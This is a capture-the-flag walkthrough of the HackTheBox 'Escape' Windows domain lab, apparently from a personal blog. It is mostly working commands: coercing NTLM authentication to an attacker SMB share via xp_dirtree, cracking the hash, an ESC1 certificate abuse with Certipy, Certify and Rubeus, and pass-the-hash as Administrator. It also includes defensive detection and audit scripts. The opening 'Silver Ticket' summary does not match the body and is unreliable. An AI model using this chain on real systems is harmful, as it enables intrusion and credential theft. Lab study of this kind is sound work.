# HTB — Escape

MSSQL Silver Ticket attack via SPN enumeration. Responder captures NTLMv2 hash from SQL query, certificate auth for Domain Admin.

November 19, 2024 · HackTheBox · Medium · Windows · AD

#AD #MSSQL #Silver Ticket #ADCS
## nmap

```sh
nmap -sC -sV -T4 -A -Pn -p- --open 10.10.11.202
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-19 22:30 EST
Nmap scan report for 10.10.11.202
Host is up (0.024s latency).
Not shown: 65516 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-11-20 11:32:37Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-11-20T11:34:10+00:00; +8h00m38s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
| Not valid before: 2024-01-18T23:03:57
|_Not valid after:  2074-01-05T23:03:57
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-11-20T11:34:11+00:00; +8h00m38s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
| Not valid before: 2024-01-18T23:03:57
|_Not valid after:  2074-01-05T23:03:57
1433/tcp  open  ms-sql-s      Microsoft SQL Server 2019 15.00.2000.00; RTM
| ms-sql-info:
|   10.10.11.202:1433:
|     Version:
|       name: Microsoft SQL Server 2019 RTM
|       number: 15.00.2000.00
|       Product: Microsoft SQL Server 2019
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
|_ssl-date: 2024-11-20T11:34:10+00:00; +8h00m38s from scanner time.
| ms-sql-ntlm-info:
|   10.10.11.202:1433:
|     Target_Name: sequel
|     NetBIOS_Domain_Name: sequel
|     NetBIOS_Computer_Name: DC
|     DNS_Domain_Name: sequel.htb
|     DNS_Computer_Name: dc.sequel.htb
|     DNS_Tree_Name: sequel.htb
|_    Product_Version: 10.0.17763
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2024-11-20T11:28:31
|_Not valid after:  2054-11-20T11:28:31
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
| Not valid before: 2024-01-18T23:03:57
|_Not valid after:  2074-01-05T23:03:57
|_ssl-date: 2024-11-20T11:34:10+00:00; +8h00m38s from scanner time.
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
| Not valid before: 2024-01-18T23:03:57
|_Not valid after:  2074-01-05T23:03:57
|_ssl-date: 2024-11-20T11:34:11+00:00; +8h00m38s from scanner time.
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
49667/tcp open  msrpc         Microsoft Windows RPC
49689/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49690/tcp open  msrpc         Microsoft Windows RPC
49708/tcp open  msrpc         Microsoft Windows RPC
49727/tcp open  msrpc         Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2019 (89%)
Aggressive OS guesses: Microsoft Windows Server 2019 (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time:
|   date: 2024-11-20T11:33:34
|_  start_date: N/A
|_clock-skew: mean: 8h00m37s, deviation: 0s, median: 8h00m37s
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required

TRACEROUTE (using port 53/tcp)
HOP RTT      ADDRESS
1   24.06 ms 10.10.14.1
2   24.55 ms 10.10.11.202

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 188.33 seconds
```

## 445/tcp open microsoft-ds?
```sh
smbclient -N -L \\\\10.10.11.202

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share
        Public          Disk
        SYSVOL          Disk      Logon server share
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.11.202 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
```
## SQL Server Procedures.pdf

The Public share is readable anonymously and holds a single PDF:

```sh
smbclient \\\\10.10.11.202\\Public
Password for [WORKGROUP\root]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sat Nov 19 06:51:25 2022
  ..                                  D        0  Sat Nov 19 06:51:25 2022
  SQL Server Procedures.pdf           A    49551  Fri Nov 18 08:39:43 2022
smb: \> get "SQL Server Procedures.pdf"
```

The PDF ends with a bonus note that hands out database credentials:

```txt
Bonus
For new hired and those that are still waiting their users to be created and perms assigned, can sneak a peek at the Database with
user PublicUser and password GuestUserCantWrite1 .
Refer to the previous guidelines and make sure to switch the "Windows Au
```

## creds

PublicUser:GuestUserCantWrite1
## mssql

```sh
impacket-mssqlclient PublicUser:'GuestUserCantWrite1'@sequel.htb
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC\SQLMOCK): Line 1: Changed database context to 'master'.
[*] INFO(DC\SQLMOCK): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208)
[!] Press help for extra shell commands
```

## responder

```sh
sudo responder -I tun0 -dwPv
```

From the SQL shell, `xp_dirtree` with a UNC path makes the SQL Server service account connect to the attacker's SMB share, and Responder captures the NTLMv2 response of `sql_svc`:

```sh
SQL (PublicUser guest@master)> EXEC master..xp_dirtree '\\10.10.14.2\share\'
```

```sh
[SMB] NTLMv2-SSP Client   : 10.10.11.202
[SMB] NTLMv2-SSP Username : sequel\sql_svc
[SMB] NTLMv2-SSP Hash     : sql_svc::sequel:c5dd59998797d94b:...
```

```sh
hashcat -m 5600 sql_svc.ntlmv2 /usr/share/wordlists/rockyou.txt
SQL_SVC::sequel:c5dd59998797d94b:7bd3915b...:...:REGGIE1234ronnie
```

## creds

SQL_SVC:REGGIE1234ronnie
## mssql

```sh
impacket-mssqlclient SQL_SVC:'REGGIE1234ronnie'@sequel.htb -windows-auth
```

## evil-winrm

```sh
evil-winrm -i 10.10.11.202 -u SQL_SVC -p 'REGGIE1234ronnie'
```

## logs

```sh
*Evil-WinRM* PS C:\SQLServer\logs> cat ERRORLOG.BAK
2022-11-18 13:43:07.44 Logon       Logon failed for user 'sequel.htb\Ryan.Cooper'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
2022-11-18 13:43:07.48 Logon       Error: 18456, Severity: 14, State: 8.
2022-11-18 13:43:07.48 Logon       Logon failed for user 'NuclearMosquito3'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
```

The second failed logon's "user" is a password that Ryan.Cooper typed into the username field, so SQL Server wrote it to the log in clear text.

## creds

Ryan.Cooper:NuclearMosquito3
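Added example (not part of the original writeup): a small detector for the pattern above, run over constructed ERRORLOG lines modelled on the entries shown. An unqualified, unknown login that fails seconds after a domain account fails from the same client is flagged as a probable password-in-username leak; the allowlist of local SQL logins is an assumption.

```python
import re
from datetime import datetime

# Constructed sample modelled on the ERRORLOG.BAK entries above (not the box's real log).
SAMPLE_LOG = """\
2022-11-18 13:43:05.12 Logon       Logon failed for user 'sequel.htb\\Ryan.Cooper'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
2022-11-18 13:43:07.44 Logon       Logon failed for user 'sequel.htb\\Ryan.Cooper'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
2022-11-18 13:43:07.48 Logon       Error: 18456, Severity: 14, State: 8.
2022-11-18 13:43:07.48 Logon       Logon failed for user 'NuclearMosquito3'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
2022-11-18 13:50:01.00 Logon       Logon failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 10.0.0.5]
"""

KNOWN_SQL_LOGINS = {"sa", "publicuser"}   # assumed local SQL logins that legitimately lack a domain prefix
WINDOW_SECONDS = 10                       # a mistyped login usually follows the real one within seconds

FAILED_LOGON = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d+)\s+Logon\s+"
    r"Logon failed for user '(?P<user>[^']+)'.*\[CLIENT: (?P<client>[^\]]+)\]"
)

def parse_failed_logons(text):
    """Yield (timestamp, user, client) for every 'Logon failed' line in an ERRORLOG."""
    for line in text.splitlines():
        m = FAILED_LOGON.match(line)
        if m:
            yield datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S.%f"), m["user"], m["client"]

def mask(secret):
    """Never copy a suspected password into an alert: keep two characters for triage."""
    return secret[:2] + "*" * (len(secret) - 2)

def find_password_as_username(text):
    """Flag an unqualified, unknown 'user' that fails right after a domain account
    failed from the same client: the shape of a password typed into the username box."""
    findings = []
    last_domain_failure = {}   # client -> (timestamp, domain account)
    for ts, user, client in parse_failed_logons(text):
        if "\\" in user or "@" in user:
            last_domain_failure[client] = (ts, user)
            continue
        if user.lower() in KNOWN_SQL_LOGINS:
            continue
        prev = last_domain_failure.get(client)
        if prev and (ts - prev[0]).total_seconds() <= WINDOW_SECONDS:
            findings.append({"time": ts.isoformat(), "client": client,
                             "account": prev[1], "suspect": mask(user)})
    return findings

if __name__ == "__main__":
    for f in find_password_as_username(SAMPLE_LOG):
        print(f"{f['time']} {f['client']}: {f['account']} then {f['suspect']} -> rotate the password")
```

The finding names the account whose password is likely sitting in the log, which is the account to rotate; the log file itself should be treated as sensitive.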
```sh
nxc winrm 10.10.11.202 -u Ryan.Cooper -p 'NuclearMosquito3'
WINRM       10.10.11.202    5985   DC    [*] Windows 10 / Server 2019 Build 17763 (name:DC) (domain:sequel.htb)
WINRM       10.10.11.202    5985   DC    [+] sequel.htb\Ryan.Cooper:NuclearMosquito3 (Pwn3d!)
```

## evil-winrm

```sh
evil-winrm -i 10.10.11.202 -u Ryan.Cooper -p 'NuclearMosquito3'
```

## user.txt

```sh
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Desktop> cat user.txt
11a7df24...
```

```sh
*Evil-WinRM* PS C:\Users\Ryan.Cooper> upload /opt/windows/SharpHound.exe
```

```sh
*Evil-WinRM* PS C:\Users\ryan.cooper> .\SharpHound.exe -c All --zipfilename sequel.htb
```

```sh
*Evil-WinRM* PS C:\Users\ryan.cooper> whoami /groups

GROUP INFORMATION
-----------------

Group Name                                  Type             SID          Attributes
=========================================== ================ ============ ==================================================
Everyone                                    Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users             Alias            S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                               Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access  Alias            S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
BUILTIN\Certificate Service DCOM Access     Alias            S-1-5-32-574 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                        Well-known group S-1-5-2      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users            Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization              Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication            Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label            S-1-16-8448
```

## certipy

- https://github.com/ly4k/Certipy

```sh
/usr/local/bin/certipy find -u ryan.cooper@sequel.htb -p 'NuclearMosquito3' -dc-ip 10.10.11.202
```

## ESC1
The UserAuthentication template from the certipy find output:

```json
"Certificate Templates": {
  "0": {
    "Template Name": "UserAuthentication",
    "Display Name": "UserAuthentication",
    "Certificate Authorities": [
      "sequel-DC-CA"
    ],
    "Enabled": true,
    "Client Authentication": true,
    "Enrollment Agent": false,
    "Any Purpose": false,
    "Enrollee Supplies Subject": true,
    "Certificate Name Flag": [
      "EnrolleeSuppliesSubject"
    ],
    "Enrollment Flag": [
      "PublishToDs",
      "IncludeSymmetricAlgorithms"
    ],
    "Private Key Flag": [
      "ExportableKey"
    ],
    "Extended Key Usage": [
      "Client Authentication",
      "Secure Email",
      "Encrypting File System"
    ],
    "Requires Manager Approval": false,
    "Requires Key Archival": false,
    "Authorized Signatures Required": 0,
    "Validity Period": "10 years",
    "Renewal Period": "6 weeks",
    "Minimum RSA Key Length": 2048,
    "Permissions": {
      "Enrollment Permissions": {
        "Enrollment Rights": [
          "SEQUEL.HTB\\Domain Admins",
          "SEQUEL.HTB\\Domain Users",
          "SEQUEL.HTB\\Enterprise Admins"
        ]
      },
      "Object Control Permissions": {
        "Owner": "SEQUEL.HTB\\Administrator",
        "Write Owner Principals": [
          "SEQUEL.HTB\\Domain Admins",
          "SEQUEL.HTB\\Enterprise Admins",
          "SEQUEL.HTB\\Administrator"
        ],
        "Write Dacl Principals": [
          "SEQUEL.HTB\\Domain Admins",
          "SEQUEL.HTB\\Enterprise Admins",
          "SEQUEL.HTB\\Administrator"
        ],
        "Write Property Principals": [
          "SEQUEL.HTB\\Domain Admins",
          "SEQUEL.HTB\\Enterprise Admins",
          "SEQUEL.HTB\\Administrator"
        ]
      }
    },
    "[!] Vulnerabilities": {
      "ESC1": "'SEQUEL.HTB\\\\Domain Users' can enroll, enrollee supplies subject and template allows client authentication"
    }
  }
```
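Added example (not part of the original writeup or of Certipy): an audit check that applies the ESC1 preconditions to a template record carrying the values certipy reported above, and a hardened copy of the same record that no longer passes them. The list of low-privileged principals is an assumption.

```python
import copy

# Principals that make a template reachable by every domain member (assumed list).
LOW_PRIV = {"domain users", "domain computers", "authenticated users", "everyone"}
AUTH_EKUS = {"Client Authentication", "PKINIT Client Authentication", "Smart Card Logon", "Any Purpose"}

# Constructed record carrying the values certipy reported for UserAuthentication above.
USER_AUTHENTICATION = {
    "Template Name": "UserAuthentication",
    "Enabled": True,
    "Any Purpose": False,
    "Enrollee Supplies Subject": True,
    "Extended Key Usage": ["Client Authentication", "Secure Email", "Encrypting File System"],
    "Requires Manager Approval": False,
    "Authorized Signatures Required": 0,
    "Permissions": {"Enrollment Permissions": {"Enrollment Rights": [
        "SEQUEL.HTB\\Domain Admins", "SEQUEL.HTB\\Domain Users", "SEQUEL.HTB\\Enterprise Admins",
    ]}},
}

def low_priv_enrollers(template):
    """Enrollment-rights entries held by broad, low-privileged groups."""
    rights = template["Permissions"]["Enrollment Permissions"].get("Enrollment Rights", [])
    return [p for p in rights if p.split("\\")[-1].lower() in LOW_PRIV]

def esc1_conditions(template):
    """Return the ESC1 preconditions as a dict; empty when any one of them fails."""
    ekus = set(template.get("Extended Key Usage", []))
    checks = {
        "enabled": bool(template.get("Enabled")),
        # no EKU at all also permits authentication, like Any Purpose
        "auth_eku": bool(ekus & AUTH_EKUS) or not ekus or bool(template.get("Any Purpose")),
        "enrollee_supplies_subject": bool(template.get("Enrollee Supplies Subject")),
        "no_manager_approval": not template.get("Requires Manager Approval", True),
        "no_signatures_required": template.get("Authorized Signatures Required", 1) == 0,
        "low_priv_can_enroll": bool(low_priv_enrollers(template)),
    }
    return checks if all(checks.values()) else {}

def remediate(template):
    """Hardened copy: the CA builds the subject from AD instead of trusting the requester,
    and every issuance waits for a CA manager's approval."""
    fixed = copy.deepcopy(template)
    fixed["Enrollee Supplies Subject"] = False
    fixed["Requires Manager Approval"] = True
    return fixed

if __name__ == "__main__":
    print("vulnerable:", esc1_conditions(USER_AUTHENTICATION))
    print("after fix: ", esc1_conditions(remediate(USER_AUTHENTICATION)))
```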
```sh
/usr/local/bin/certipy req -username ryan.cooper@sequel.htb -password 'NuclearMosquito3' -ca sequel-DC-CA -template UserAuthentication -upn administrator@sequel.htb -dc-ip 10.10.11.202
Certipy v4.8.2 - by Oliver Lyak (ly4k)

/usr/local/lib/python3.11/dist-packages/requests/__init__.py:102: RequestsDependencyWarning: urllib3 (1.26.12) or chardet (5.1.0)/charset_normalizer (2.0.12) doesn't match a supported version!
  warnings.warn("urllib3 ({}) or chardet ({})/charset_normalizer ({}) doesn't match a supported "
[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 15
[*] Got certificate with UPN 'administrator@sequel.htb'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'
```

```sh
/usr/local/bin/certipy req -u ryan.cooper@sequel.htb -p NuclearMosquito3 -upn administrator@sequel.htb -target sequel.htb -ca sequel-dc-ca -template UserAuthentication
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 17
[*] Got certificate with UPN 'administrator@sequel.htb'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'
```

Reference syntax for the request, as given in the Certipy documentation:

```sh
certipy req -username john@corp.local -password Passw0rd -ca corp-DC-CA -target ca.corp.local -template ESC1-Test -upn administrator@corp.local -dns dc.corp.local
```

```sh
certipy req -u ryan.cooper@sequel.htb -p NuclearMosquito3 -upn administrator@sequel.htb \
  -target sequel.htb -ca sequel-dc-ca -template UserAuthentication
```

Sync the clock with the DC first: nmap reported an 8h00m38s skew, and Kerberos rejects requests outside its clock tolerance.

```sh
sudo ntpdate -u dc.sequel.htb
```

```sh
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Documents> upload /opt/windows/Certify.exe
```
```sh
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Documents> ./certify.exe request /ca:dc.sequel.htb\sequel-DC-CA /template:UserAuthentication /altname:Administrator

   _____          _   _  __
  / ____|        | | (_)/ _|
 | |     ___ _ __| |_ _| |_ _   _
 | |    / _ \ '__| __| |  _| | | |
 | |___|  __/ |  | |_| | | | |_| |
  \_____\___|_|   \__|_|_|  \__, |
                             __/ |
                            |___./
  v1.1.0

[*] Action: Request a Certificates

[*] Current user context    : sequel\Ryan.Cooper
[*] No subject name specified, using current context as subject.

[*] Template                : UserAuthentication
[*] Subject                 : CN=Ryan.Cooper, CN=Users, DC=sequel, DC=htb
[*] AltName                 : Administrator

[*] Certificate Authority   : dc.sequel.htb\sequel-DC-CA

[*] CA Response             : The certificate had been issued.
[*] Request ID              : 22

[*] cert.pem         :

-----BEGIN RSA PRIVATE KEY-----
...
-----END RSA PRIVATE KEY-----
-----BEGIN CERTIFICATE-----
...
-----END CERTIFICATE-----

[*] Convert with: openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
```

- save the entire output (private key and certificate) from Certify as `cert.pem`
- skip the export password
```sh
openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
```

```sh
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Documents> upload /home/sake/htb-labs/Escape/cert.pfx
```

```sh
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Documents> upload /opt/windows/Rubeus.exe
```

```sh
.\Rubeus.exe asktgt /user:administrator /certificate:C:\Users\Ryan.Cooper\Documents\cert.pfx /getcredentials /show /nowrap

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.0.2

[*] Action: Ask TGT

[*] Using PKINIT with etype rc4_hmac and subject: CN=Ryan.Cooper, CN=Users, DC=sequel, DC=htb
[*] Building AS-REQ (w/ PKINIT preauth) for: 'sequel.htb\administrator'
[*] Using domain controller: fe80::106a:3318:bb4:4889%4:88
[+] TGT request successful!
[*] base64(ticket.kirbi):

      ...

  ServiceName              :  krbtgt/sequel.htb
  ServiceRealm             :  SEQUEL.HTB
  UserName                 :  administrator
  UserRealm                :  SEQUEL.HTB
  StartTime                :  11/20/2024 11:52:46 PM
  EndTime                  :  11/21/2024 9:52:46 AM
  RenewTill                :  11/27/2024 11:52:46 PM
  Flags                    :  name_canonicalize, pre_authent, initial, renewable
  KeyType                  :  rc4_hmac
  Base64(key)              :  K1/qkSKrODCfU+AvCUmUfA==
  ASREP (key)              :  B8FB799BD34A0B4DFAB11761B50CD1B2

[*] Getting credentials using U2U

  CredentialInfo         :
    Version              : 0
    EncryptionType       : rc4_hmac
    CredentialData       :
      CredentialCount    : 1
       NTLM              : A52F78E4C751E5F5E17E1E9F3E58F4EE
```
## admin ntlm

```sh
A52F78E4C751E5F5E17E1E9F3E58F4EE
```

```sh
evil-winrm -i 10.10.11.202 -u administrator -H 'A52F78E4C751E5F5E17E1E9F3E58F4EE'

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
sequel\administrator
```

## root.txt

```sh
*Evil-WinRM* PS C:\Users\Administrator\Desktop> cat root.txt
e877636f...
```